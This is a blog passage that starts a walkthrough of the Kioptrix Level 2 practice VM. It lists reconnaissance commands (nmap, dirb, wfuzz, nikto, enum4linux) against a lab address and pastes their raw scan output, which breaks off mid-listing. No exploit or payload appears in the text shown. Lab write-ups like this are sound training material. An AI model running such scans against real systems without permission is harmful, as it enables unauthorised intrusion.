Tuesday, 16 August 2016

Kioptrix Level 2


Scenario let's try this:
netdiscover -r 192.168.180.0/24
nmap -sV -T4 -O -F --version-light 192.168.180.138
nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.138
nmap -sC -sU -T4 -A -v -v -Pn –top-ports 200 192.168.180.138
dirb http://192.168.180.138
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.138/FUZZ
nikto -h 192.168.180.138

In case there is SMB:
smbclient -N -L 192.168.180.138
enum4linux -a 192.168.180.138


netdiscover -r 192.168.180.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts                 
                                                                               
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.180.1   00:50:56:c0:00:08      1      60  VMware, Inc.                
 192.168.180.2   00:50:56:f9:f6:4a      1      60  VMware, Inc.                
 192.168.180.138 00:0c:29:04:7c:66      1      60  VMware, Inc.                
 192.168.180.254 00:50:56:fa:45:3e      1      60  VMware, Inc.        


nmap -sV -T4 -O -F --version-light 192.168.180.138

Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-09 01:49 EDT
Nmap scan report for 192.168.180.138
Host is up (0.00015s latency).
Not shown: 94 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
111/tcp  open  rpcbind
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
631/tcp  open  ipp      CUPS 1.1
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:04:7C:66 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.46 seconds

nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.138

Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-09 01:50 EDT
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:50
Completed NSE at 01:50, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:50
Completed NSE at 01:50, 0.00s elapsed
Initiating ARP Ping Scan at 01:50
Scanning 192.168.180.138 [1 port]
Completed ARP Ping Scan at 01:50, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:50
Completed Parallel DNS resolution of 1 host. at 01:50, 13.00s elapsed
Initiating SYN Stealth Scan at 01:50
Scanning 192.168.180.138 [1000 ports]
Discovered open port 80/tcp on 192.168.180.138
Discovered open port 443/tcp on 192.168.180.138
Discovered open port 3306/tcp on 192.168.180.138
Discovered open port 111/tcp on 192.168.180.138
Discovered open port 22/tcp on 192.168.180.138
Discovered open port 631/tcp on 192.168.180.138
Discovered open port 843/tcp on 192.168.180.138
Completed SYN Stealth Scan at 01:50, 0.04s elapsed (1000 total ports)
Initiating Service scan at 01:50
Scanning 7 services on 192.168.180.138
Completed Service scan at 01:51, 12.03s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against 192.168.180.138
NSE: Script scanning 192.168.180.138.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:51
Completed NSE at 01:51, 2.13s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
Nmap scan report for 192.168.180.138
Host is up, received arp-response (0.00015s latency).
Scanned at 2016-08-09 01:50:35 EDT for 29s
Not shown: 993 closed ports
Reason: 993 resets
PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 64 OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 35 149174282886581624883868648302761292182406879108668063702143177994710569161669502445416601666211201346192352271911333433971833283425439634231257314174441054335295864218587993634534355128377261436615077053235666774641007412196140534221696911370388178873572900977872600139866890316021962605461192127591516843621
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAOWJ2N2BPBPm0HxCi630ZxHtTNMh+uVkeYCkKVNxavZkcJdpfFTOGZp054sj27mVZVtCeNMHhzAUpvRisn/cH4k4plLd1m8HACAVPtcgRrshCzb7wzQikrP+byCVypE0RpkQcDya+ngDMVzrkA+9KQSR/5W6BjldLW60A5oZgyfvAAAAFQC/iRZe4LlaYXwHvYYDpjnoCPY3xQAAAIBKFGl/zr/u1JxCV8a9dIAMIE0rk0jYtwvpDCdBre450ruoLII/hsparzdJs898SMWX1kEzigzUdtobDVT8nWdJAVRHCm8ruy4IQYIdtjYowXD7hxZTy/F0xOsiTRWBYMQPe8lW1oA+xabqlnCO3ppjmBecVlCwEMoeefnwGWAkxwAAAIAKajcioQiMDYW7veV13Yjmag6wyIia9+V9aO8JmgMi3cNr04Vl0FF+n7OIZ5QYvpSKcQgRzwNylEW5juV0Xh96m2g3rqEvDd4kTttCDlOltPgP6q6Z8JI0IGzcIGYBy6UWdIxj9D7F2ccc7fAM2o22+qgFp+FFiLeFDVbRhYz4sg==
|   1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA4j5XFFw9Km2yphjpu1gzDBglGSpMxtR8zOvpH9gUbOMXXbCQeXgOK3rs4cs/j75G54jALm99Ky7tgToNaEuxmQmwnpYk9bntoDu9SkiT/hPZdOwq40yrfWIHzlUNWTpY3okTdf/YNUAdl4NOBOYbf0x/dsAdHHqSWnvZmruFA6M=
|_sshv1: Server supports SSHv1
80/tcp   open  http     syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  syn-ack ttl 64 2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            840/udp  status
|_  100024  1            843/tcp  status
443/tcp  open  ssl/http syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/localityName=SomeCity/emailAddress=root@localhost.localdomain/organizationalUnitName=SomeOrganizationalUnit
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/localityName=SomeCity/emailAddress=root@localhost.localdomain/organizationalUnitName=SomeOrganizationalUnit
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after:  2010-10-08T00:10:47
| MD5:   01de 29f9 fbfb 2eb2 beaf e624 3157 090f
| SHA-1: 560c 9196 6506 fb0f fb81 66b1 ded3 ac11 2ed4 808a
| -----BEGIN CERTIFICATE-----
| MIIEDDCCA3WgAwIBAgIBADANBgkqhkiG9w0BAQQFADCBuzELMAkGA1UEBhMCLS0x
| EjAQBgNVBAgTCVNvbWVTdGF0ZTERMA8GA1UEBxMIU29tZUNpdHkxGTAXBgNVBAoT
| EFNvbWVPcmdhbml6YXRpb24xHzAdBgNVBAsTFlNvbWVPcmdhbml6YXRpb25hbFVu
| aXQxHjAcBgNVBAMTFWxvY2FsaG9zdC5sb2NhbGRvbWFpbjEpMCcGCSqGSIb3DQEJ
| ARYacm9vdEBsb2NhbGhvc3QubG9jYWxkb21haW4wHhcNMDkxMDA4MDAxMDQ3WhcN
| MTAxMDA4MDAxMDQ3WjCBuzELMAkGA1UEBhMCLS0xEjAQBgNVBAgTCVNvbWVTdGF0
| ZTERMA8GA1UEBxMIU29tZUNpdHkxGTAXBgNVBAoTEFNvbWVPcmdhbml6YXRpb24x
| HzAdBgNVBAsTFlNvbWVPcmdhbml6YXRpb25hbFVuaXQxHjAcBgNVBAMTFWxvY2Fs
| aG9zdC5sb2NhbGRvbWFpbjEpMCcGCSqGSIb3DQEJARYacm9vdEBsb2NhbGhvc3Qu
| bG9jYWxkb21haW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAN4duNVEr4aL
| TUfsjacXKcCaRs1oTxsdNTIxkp7SV2PDD+mBY5shsXt/FMG7Upf4g605+W6ZEhfB
| WpLXonDFaRIxxn4AGSOLg8q20kUt9p2HZufaSLSwfSwJ+CTMwYtN8AU0jhf3r0y8
| jr+jjEU0HT4O4YXcnDRvbIUeHKedPPsTAgMBAAGjggEcMIIBGDAdBgNVHQ4EFgQU
| QAs+OwqZIYsWClQ2ZBav2uPP/mAwgegGA1UdIwSB4DCB3YAUQAs+OwqZIYsWClQ2
| ZBav2uPP/mChgcGkgb4wgbsxCzAJBgNVBAYTAi0tMRIwEAYDVQQIEwlTb21lU3Rh
| dGUxETAPBgNVBAcTCFNvbWVDaXR5MRkwFwYDVQQKExBTb21lT3JnYW5pemF0aW9u
| MR8wHQYDVQQLExZTb21lT3JnYW5pemF0aW9uYWxVbml0MR4wHAYDVQQDExVsb2Nh
| bGhvc3QubG9jYWxkb21haW4xKTAnBgkqhkiG9w0BCQEWGnJvb3RAbG9jYWxob3N0
| LmxvY2FsZG9tYWluggEAMAwGA1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEEBQADgYEA
| Hvq7KPeUTn36Sz/Au95TmC7aSkhIkGVHMRGhWe7KTEflqQffYTqJOS4xsu/FxDRy
| 9IGOapsyILGEx57apuCYJW3tpwMUrpUXu/x9g3LM+VghiH0XxMOfbueVhqWZ+yP8
| LisROr5u+FeGOBBIINAmpWUX2xEdB4p97WYzP03rEQU=
|_-----END CERTIFICATE-----
|_ssl-date: 2016-08-09T02:41:19+00:00; -3h09m45s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp  open  ipp      syn-ack ttl 64 CUPS 1.1
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
843/tcp  open  status   syn-ack ttl 64 1 (RPC #100024)
3306/tcp open  mysql    syn-ack ttl 64 MySQL (unauthorized)
MAC Address: 00:0C:29:04:7C:66 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
TCP/IP fingerprint:
OS:SCAN(V=7.01%E=4%D=8/9%OT=22%CT=1%CU=38334%PV=Y%DS=1%DC=D%G=Y%M=000C29%TM
OS:=57A96F48%P=i586-pc-linux-gnu)SEQ(SP=C4%GCD=1%ISR=C6%TI=Z%CI=Z%II=I%TS=A
OS:)OPS(O1=M5B4ST11NW2%O2=M5B4ST11NW2%O3=M5B4NNT11NW2%O4=M5B4ST11NW2%O5=M5B
OS:4ST11NW2%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0
OS:)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW2%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW2
OS:%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN
OS:=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.003 days (since Tue Aug  9 01:47:22 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=196 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT     ADDRESS
1   0.15 ms 192.168.180.138

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.42 seconds
           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.366KB)


 nmap -sC -sU -T4 -A -v -v -Pn –top-ports 200 192.168.180.138

Starting Nmap 7.01 ( https://nmap.org ) at 2016-08-09 01:52 EDT
PORT      STATE         SERVICE        REASON              VERSION
68/udp    open|filtered dhcpc          no-response
111/udp   open          rpcbind        udp-response ttl 64 2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            840/udp  status
|_  100024  1            843/tcp  status
631/udp   open|filtered ipp            no-response
683/udp   open|filtered corba-iiop     no-response
1021/udp  open|filtered exp1           no-response
1024/udp  open|filtered unknown        no-response
1054/udp  open|filtered brvread        no-response
6971/udp  open|filtered unknown        no-response
9020/udp  open|filtered tambora        no-response
17018/udp open|filtered unknown        no-response
18228/udp open|filtered unknown        no-response
19956/udp open|filtered unknown        no-response
20309/udp open|filtered unknown        no-response
20665/udp open|filtered unknown        no-response
21298/udp open|filtered unknown        no-response
22739/udp open|filtered unknown        no-response
26966/udp open|filtered unknown        no-response
29823/udp open|filtered unknown        no-response
30303/udp open|filtered unknown        no-response
32771/udp open|filtered sometimes-rpc6 no-response
47624/udp open|filtered directplaysrvr no-response
49156/udp open|filtered unknown        no-response
49393/udp open|filtered unknown        no-response
60423/udp open|filtered unknown        no-response
MAC Address: 00:0C:29:04:7C:66 (VMware)
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SCAN(V=7.01%E=4%D=8/9%OT=%CT=%CU=2%PV=Y%DS=1%DC=D%G=N%M=000C29%TM=57A97403%P=i586-pc-linux-gnu)
SEQ(CI=Z%II=I)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.21 ms 192.168.180.138

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 02:11
Completed NSE at 02:11, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 02:11
Completed NSE at 02:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1149.92 seconds
           Raw packets sent: 1574 (46.348KB) | Rcvd: 1071 (61.672KB)


dirb http://192.168.180.138

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Aug  9 02:12:19 2016
URL_BASE: http://192.168.180.138/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.180.138/ ----
+ http://192.168.180.138/cgi-bin/ (CODE:403|SIZE:291)                          
+ http://192.168.180.138/index.php (CODE:200|SIZE:667)                         
==> DIRECTORY: http://192.168.180.138/manual/                                  
+ http://192.168.180.138/usage (CODE:403|SIZE:288)                             
                                                                               
---- Entering directory: http://192.168.180.138/manual/ ----
==> DIRECTORY: http://192.168.180.138/manual/de/                               
==> DIRECTORY: http://192.168.180.138/manual/developer/                        
==> DIRECTORY: http://192.168.180.138/manual/en/                               
==> DIRECTORY: http://192.168.180.138/manual/faq/                              
==> DIRECTORY: http://192.168.180.138/manual/fr/                               
==> DIRECTORY: http://192.168.180.138/manual/howto/                            
==> DIRECTORY: http://192.168.180.138/manual/images/                           
+ http://192.168.180.138/manual/index.html (CODE:200|SIZE:7234)                
==> DIRECTORY: http://192.168.180.138/manual/ja/                               
==> DIRECTORY: http://192.168.180.138/manual/ko/                               
+ http://192.168.180.138/manual/LICENSE (CODE:200|SIZE:11358)                  
==> DIRECTORY: http://192.168.180.138/manual/misc/                             
==> DIRECTORY: http://192.168.180.138/manual/mod/                              
==> DIRECTORY: http://192.168.180.138/manual/programs/                         
==> DIRECTORY: http://192.168.180.138/manual/ru/                               
==> DIRECTORY: http://192.168.180.138/manual/ssl/                              
==> DIRECTORY: http://192.168.180.138/manual/style/                            
                                                                               
---- Entering directory: http://192.168.180.138/manual/de/ ----
+ http://192.168.180.138/manual/de/de (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/de/developer/                     
+ http://192.168.180.138/manual/de/en (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/de/faq/                           
+ http://192.168.180.138/manual/de/fr (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/de/howto/                         
==> DIRECTORY: http://192.168.180.138/manual/de/images/                        
+ http://192.168.180.138/manual/de/index.html (CODE:200|SIZE:7317)             
+ http://192.168.180.138/manual/de/ja (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/de/ko (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/de/LICENSE (CODE:200|SIZE:11358)               
==> DIRECTORY: http://192.168.180.138/manual/de/misc/                          
==> DIRECTORY: http://192.168.180.138/manual/de/mod/                           
==> DIRECTORY: http://192.168.180.138/manual/de/programs/                      
+ http://192.168.180.138/manual/de/ru (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/de/ssl/                           
==> DIRECTORY: http://192.168.180.138/manual/de/style/                         
                                                                               
---- Entering directory: http://192.168.180.138/manual/developer/ ----
+ http://192.168.180.138/manual/developer/index.html (CODE:200|SIZE:4770)      
                                                                               
---- Entering directory: http://192.168.180.138/manual/en/ ----
+ http://192.168.180.138/manual/en/de (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/en/developer/                     
+ http://192.168.180.138/manual/en/en (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/en/faq/                           
+ http://192.168.180.138/manual/en/fr (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/en/howto/                         
==> DIRECTORY: http://192.168.180.138/manual/en/images/                        
+ http://192.168.180.138/manual/en/index.html (CODE:200|SIZE:7234)             
+ http://192.168.180.138/manual/en/ja (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/en/ko (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/en/LICENSE (CODE:200|SIZE:11358)               
==> DIRECTORY: http://192.168.180.138/manual/en/misc/                          
==> DIRECTORY: http://192.168.180.138/manual/en/mod/                           
==> DIRECTORY: http://192.168.180.138/manual/en/programs/                      
+ http://192.168.180.138/manual/en/ru (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/en/ssl/                           
==> DIRECTORY: http://192.168.180.138/manual/en/style/                         
                                                                               
---- Entering directory: http://192.168.180.138/manual/faq/ ----
+ http://192.168.180.138/manual/faq/index.html (CODE:200|SIZE:3564)            
                                                                               
---- Entering directory: http://192.168.180.138/manual/fr/ ----
+ http://192.168.180.138/manual/fr/de (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/fr/developer/                     
+ http://192.168.180.138/manual/fr/en (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/fr/faq/                           
+ http://192.168.180.138/manual/fr/fr (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/fr/howto/                         
==> DIRECTORY: http://192.168.180.138/manual/fr/images/                        
+ http://192.168.180.138/manual/fr/index.html (CODE:200|SIZE:7234)             
+ http://192.168.180.138/manual/fr/ja (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/fr/ko (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/fr/LICENSE (CODE:200|SIZE:11358)               
==> DIRECTORY: http://192.168.180.138/manual/fr/misc/                          
==> DIRECTORY: http://192.168.180.138/manual/fr/mod/                           
==> DIRECTORY: http://192.168.180.138/manual/fr/programs/                      
+ http://192.168.180.138/manual/fr/ru (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/fr/ssl/                           
==> DIRECTORY: http://192.168.180.138/manual/fr/style/                         
                                                                               
---- Entering directory: http://192.168.180.138/manual/howto/ ----
+ http://192.168.180.138/manual/howto/index.html (CODE:200|SIZE:5685)          
                                                                               
---- Entering directory: http://192.168.180.138/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/ja/ ----
+ http://192.168.180.138/manual/ja/de (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ja/developer/                     
+ http://192.168.180.138/manual/ja/en (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ja/faq/                           
+ http://192.168.180.138/manual/ja/fr (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ja/howto/                         
==> DIRECTORY: http://192.168.180.138/manual/ja/images/                        
+ http://192.168.180.138/manual/ja/index.html (CODE:200|SIZE:7227)             
+ http://192.168.180.138/manual/ja/ja (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/ja/ko (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/ja/LICENSE (CODE:200|SIZE:11358)               
==> DIRECTORY: http://192.168.180.138/manual/ja/misc/                          
==> DIRECTORY: http://192.168.180.138/manual/ja/mod/                           
==> DIRECTORY: http://192.168.180.138/manual/ja/programs/                      
+ http://192.168.180.138/manual/ja/ru (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ja/ssl/                           
==> DIRECTORY: http://192.168.180.138/manual/ja/style/                         
                                                                               
---- Entering directory: http://192.168.180.138/manual/ko/ ----
+ http://192.168.180.138/manual/ko/de (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ko/developer/                     
+ http://192.168.180.138/manual/ko/en (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ko/faq/                           
+ http://192.168.180.138/manual/ko/fr (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ko/howto/                         
==> DIRECTORY: http://192.168.180.138/manual/ko/images/                        
+ http://192.168.180.138/manual/ko/index.html (CODE:200|SIZE:6954)             
+ http://192.168.180.138/manual/ko/ja (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/ko/ko (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/ko/LICENSE (CODE:200|SIZE:11358)               
==> DIRECTORY: http://192.168.180.138/manual/ko/misc/                          
==> DIRECTORY: http://192.168.180.138/manual/ko/mod/                           
==> DIRECTORY: http://192.168.180.138/manual/ko/programs/                      
+ http://192.168.180.138/manual/ko/ru (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ko/ssl/                           
==> DIRECTORY: http://192.168.180.138/manual/ko/style/                         
                                                                               
---- Entering directory: http://192.168.180.138/manual/misc/ ----
+ http://192.168.180.138/manual/misc/index.html (CODE:200|SIZE:5491)           
                                                                               
---- Entering directory: http://192.168.180.138/manual/mod/ ----
+ http://192.168.180.138/manual/mod/index.html (CODE:200|SIZE:13437)           
                                                                               
---- Entering directory: http://192.168.180.138/manual/programs/ ----
+ http://192.168.180.138/manual/programs/index.html (CODE:200|SIZE:4664)       
                                                                               
---- Entering directory: http://192.168.180.138/manual/ru/ ----
+ http://192.168.180.138/manual/ru/de (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ru/developer/                     
+ http://192.168.180.138/manual/ru/en (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ru/faq/                           
+ http://192.168.180.138/manual/ru/fr (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ru/howto/                         
==> DIRECTORY: http://192.168.180.138/manual/ru/images/                        
+ http://192.168.180.138/manual/ru/index.html (CODE:200|SIZE:7277)             
+ http://192.168.180.138/manual/ru/ja (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/ru/ko (CODE:301|SIZE:321)                      
+ http://192.168.180.138/manual/ru/LICENSE (CODE:200|SIZE:11358)               
==> DIRECTORY: http://192.168.180.138/manual/ru/misc/                          
==> DIRECTORY: http://192.168.180.138/manual/ru/mod/                           
==> DIRECTORY: http://192.168.180.138/manual/ru/programs/                      
+ http://192.168.180.138/manual/ru/ru (CODE:301|SIZE:321)                      
==> DIRECTORY: http://192.168.180.138/manual/ru/ssl/                           
==> DIRECTORY: http://192.168.180.138/manual/ru/style/                         
                                                                               
---- Entering directory: http://192.168.180.138/manual/ssl/ ----
+ http://192.168.180.138/manual/ssl/index.html (CODE:200|SIZE:3988)            
                                                                               
---- Entering directory: http://192.168.180.138/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/de/developer/ ----
+ http://192.168.180.138/manual/de/developer/index.html (CODE:200|SIZE:4770)   
                                                                               
---- Entering directory: http://192.168.180.138/manual/de/faq/ ----
+ http://192.168.180.138/manual/de/faq/index.html (CODE:200|SIZE:3564)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/de/howto/ ----
+ http://192.168.180.138/manual/de/howto/index.html (CODE:200|SIZE:5685)       
                                                                               
---- Entering directory: http://192.168.180.138/manual/de/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/de/misc/ ----
+ http://192.168.180.138/manual/de/misc/index.html (CODE:200|SIZE:5491)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/de/mod/ ----
+ http://192.168.180.138/manual/de/mod/index.html (CODE:200|SIZE:13561)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/de/programs/ ----
+ http://192.168.180.138/manual/de/programs/index.html (CODE:200|SIZE:4664)    
                                                                               
---- Entering directory: http://192.168.180.138/manual/de/ssl/ ----
+ http://192.168.180.138/manual/de/ssl/index.html (CODE:200|SIZE:3988)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/de/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/en/developer/ ----
+ http://192.168.180.138/manual/en/developer/index.html (CODE:200|SIZE:4770)   
                                                                               
---- Entering directory: http://192.168.180.138/manual/en/faq/ ----
+ http://192.168.180.138/manual/en/faq/index.html (CODE:200|SIZE:3564)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/en/howto/ ----
+ http://192.168.180.138/manual/en/howto/index.html (CODE:200|SIZE:5685)       
                                                                               
---- Entering directory: http://192.168.180.138/manual/en/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/en/misc/ ----
+ http://192.168.180.138/manual/en/misc/index.html (CODE:200|SIZE:5491)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/en/mod/ ----
+ http://192.168.180.138/manual/en/mod/index.html (CODE:200|SIZE:13437)        
                                                                               
---- Entering directory: http://192.168.180.138/manual/en/programs/ ----
+ http://192.168.180.138/manual/en/programs/index.html (CODE:200|SIZE:4664)    
                                                                               
---- Entering directory: http://192.168.180.138/manual/en/ssl/ ----
+ http://192.168.180.138/manual/en/ssl/index.html (CODE:200|SIZE:3988)         
                                                                               
---- Entering directory: http://192.168.180.138/manual/en/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.180.138/manual/fr/developer/ ----
+ http://192.168.180.138/manual/fr/developer/index.html (CODE:200|SIZE:4770)   
                                                                               
---- Entering directory: http://192.168.180.138/manual/fr/faq/ ----
